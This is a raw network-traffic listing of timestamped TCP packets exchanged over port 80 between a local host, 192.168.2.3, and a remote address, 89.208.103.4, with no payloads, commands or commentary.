Aug 11, 2022 06:57:08.772202969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772228003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772236109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772275925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772566080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772607088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772644997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772680044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772716999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772718906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772754908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.772768974 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772774935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772778988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772783995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.772841930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778122902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778163910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778188944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778201103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778222084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778237104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778251886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778275013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778284073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778312922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778327942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778351068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778357983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778388977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778403997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778424978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778434038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778461933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778470039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778508902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778557062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778609037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778620958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778657913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.778671980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.778704882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779179096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779220104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779237986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779256105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779273987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779294014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779304028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779334068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779345036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779378891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779395103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779432058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779443979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779469967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779480934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779510021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779520035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779546022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779556990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779583931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779594898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779619932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779629946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779659033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779669046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779697895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779706001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779733896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779745102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779771090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779784918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779808044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779817104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779844046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779856920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779881954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779890060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779918909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779930115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779958010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.779966116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.779997110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780004025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780033112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780046940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780082941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780100107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780122042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780132055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780158043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780175924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780194998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780203104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780232906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780244112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780267954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780280113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780306101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780314922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780343056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780354023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780380964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780396938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780420065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780428886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780456066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780472040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780492067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780502081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780533075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780541897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780570030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780581951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780608892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780616045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780647039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780669928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780683994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780697107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780723095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780734062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780759096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780770063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780797005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780807018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780834913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780848980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780870914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.780883074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.780920029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.782773018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.782836914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.787758112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.787794113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.787821054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.787847996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796576977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796624899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796663046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796674967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796699047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796701908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796722889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796736956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796746969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796773911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796785116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796813011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796827078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796863079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796904087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.796948910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.796968937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.797008038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.797015905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.797056913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799587011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799628019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799662113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799664974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799693108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799704075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799711943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799740076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799751043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799777031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799793959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799813986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799823046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799851894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799860001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799890995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799901009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799927950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799936056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.799964905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.799973011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800003052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800020933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800054073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800070047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800107956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800117016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800147057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800153971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800184965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800193071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800220966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800231934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800255060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.800266027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.800318956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.814892054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.814935923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.814974070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815010071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815011024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815040112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815047979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815087080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815090895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815119982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815135002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815155029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815162897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815193892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815229893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815264940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815289021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815301895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815330982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815339088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815354109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815404892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815407038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815444946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815453053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815483093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815490961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815521002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815548897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815558910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815577984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815596104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815606117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815634012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815642118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815671921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815680981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815709114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815732002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815747023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815768003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815783978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815799952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815819979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815833092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815856934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815871000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815893888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815905094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.815932035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.815969944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816006899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816045046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816081047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816117048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816154957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816180944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816191912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816220045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816229105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816246986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816268921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816292048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816304922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816342115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816380024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816417933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816441059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816456079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816464901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816493034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816533089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816535950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816540003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816572905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816589117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816608906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816636086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816647053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816654921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816684008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816694021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816720963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816728115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816760063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816780090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816796064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816824913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816833973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816843033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816871881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816881895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816907883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816917896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816946030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816952944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.816982985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.816992998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817018986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817029953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817056894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817068100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817094088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817104101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817131996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817140102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817171097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817178965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817207098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817217112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817244053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817254066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817281008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817291021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817317963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817328930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817354918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817363977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817393064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817404032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817430973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817440987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817470074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817477942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817506075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817517042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817545891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817553043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817583084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817591906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817619085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817629099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817656994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817667007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817693949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817704916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817732096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817740917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817770958 CEST	80	49736	89.208.103.4	192.168.2.3
